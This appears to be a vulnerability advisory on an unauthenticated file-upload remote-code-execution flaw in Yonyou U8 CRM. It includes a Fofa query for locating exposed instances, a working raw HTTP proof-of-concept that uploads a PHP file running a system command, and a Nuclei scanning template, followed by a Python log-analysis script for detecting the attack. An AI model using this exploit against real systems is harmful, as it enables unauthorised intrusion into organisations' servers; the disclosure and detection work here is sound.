安全矩阵
Yonyou U8 CRM uploadfile file upload leading to RCE vulnerability

Posted on 2024-6-3 22:45:14
Fofa query
title="用友U8CRM"
Vulnerability PoC
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="1.php "
Content-Type: application/octet-stream

<?php system("whoami");unlink(__FILE__);?>
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

Nuclei
id: yonyou-crm-arbitrary-file-upload

info:
  name: Yonyou CRM - Arbitrary File Upload
  author: HK
  severity: high
  description: 用友CRM系统的uploadfile.php接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件。
  metadata:
    fofa-query: app="用友U8CRM"
  tags: yonyou,crm,fileupload

http:
  - raw:
    - |
      POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
      Host: {{Hostname}}
      Connection: close
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt

      ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      Content-Disposition: form-data; name="file"; filename="%s.php "
      Content-Type: application/octet-stream

      <?php print(1111*2222);unlink(__FILE__);?>
      ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      Content-Disposition: form-data; name="upload"

      upload
      ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

    - |
      GET /tmpfile/{{uploadfile}} HTTP/1.1
      Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: uploadfile
        regex:
          - '(upd\w+\.tmp\.php)'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '2468642'

      - type: status
        status:
          - 200
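From the defender's side, the two requests in the PoC and the Nuclei template give a clear signature to hunt for in web server access logs: a POST to /ajax/uploadfile.php carrying DontCheckLogin=1, followed shortly by a GET for a .php file under /tmpfile/ (the upd*.tmp.php name the template's extractor looks for). The script below is an added example, not code from the original post or from Yonyou; it parses combined-format access-log lines (the sample lines are constructed, not real traffic) and correlates the two events per client IP within a time window. The log format, the 5-minute window and the severity labels are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2024:22:40:01 +0800] "POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Jun/2024:22:40:02 +0800] "GET /tmpfile/upd1717425601.tmp.php HTTP/1.1" 200 7 "-" "Mozilla/5.0"
198.51.100.4 - - [03/Jun/2024:22:41:10 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [03/Jun/2024:22:41:15 +0800] "POST /ajax/uploadfile.php?vname=file HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [03/Jun/2024:22:50:00 +0800] "GET /tmpfile/upd9999.tmp.php HTTP/1.1" 404 0 "-" "curl/8.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Path shape the Nuclei template extracts after a successful upload.
TMPFILE_PHP_RE = re.compile(r'^/tmpfile/upd\w+\.tmp\.php$', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def is_unauth_upload(rec):
    """POST to the upload endpoint carrying the login-bypass parameter used in the PoC."""
    return (
        rec["method"] == "POST"
        and rec["path"].lower() == "/ajax/uploadfile.php"
        and rec["query"].get("DontCheckLogin", ["0"])[0] == "1"
    )


def is_tmpfile_php_hit(rec):
    """GET for an uploaded temp file with a .php extension (where the PoC payload lands)."""
    return rec["method"] == "GET" and TMPFILE_PHP_RE.match(rec["path"]) is not None


def analyze(log_text, window=timedelta(minutes=5)):
    """Return one alert per suspicious request, escalated to 'high' when an
    unauthenticated upload is followed by a successful .php temp-file fetch
    from the same client IP within `window` (assumed correlation window)."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    alerts = []
    uploads_by_ip = {}
    for rec in records:
        if is_unauth_upload(rec):
            uploads_by_ip.setdefault(rec["ip"], []).append(rec["ts"])
            alerts.append({"ip": rec["ip"], "severity": "medium",
                           "reason": "unauthenticated upload (DontCheckLogin=1)"})
        elif is_tmpfile_php_hit(rec):
            chained = any(timedelta(0) <= rec["ts"] - t <= window
                          for t in uploads_by_ip.get(rec["ip"], []))
            alerts.append({
                "ip": rec["ip"],
                "severity": "high" if chained and rec["status"] == 200 else "medium",
                "reason": "php temp file fetched after upload" if chained
                          else "php temp file requested",
            })
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["severity"].upper(), a["ip"], a["reason"])
```

On the sample input the script flags the first client twice (the upload, then the chained fetch as high), ignores the second client's ordinary upload without the bypass parameter, and flags the third client's lone 404 probe at medium. A standalone DontCheckLogin=1 POST is worth alerting on even without the follow-up request, since the upload alone already means the authentication check was skipped.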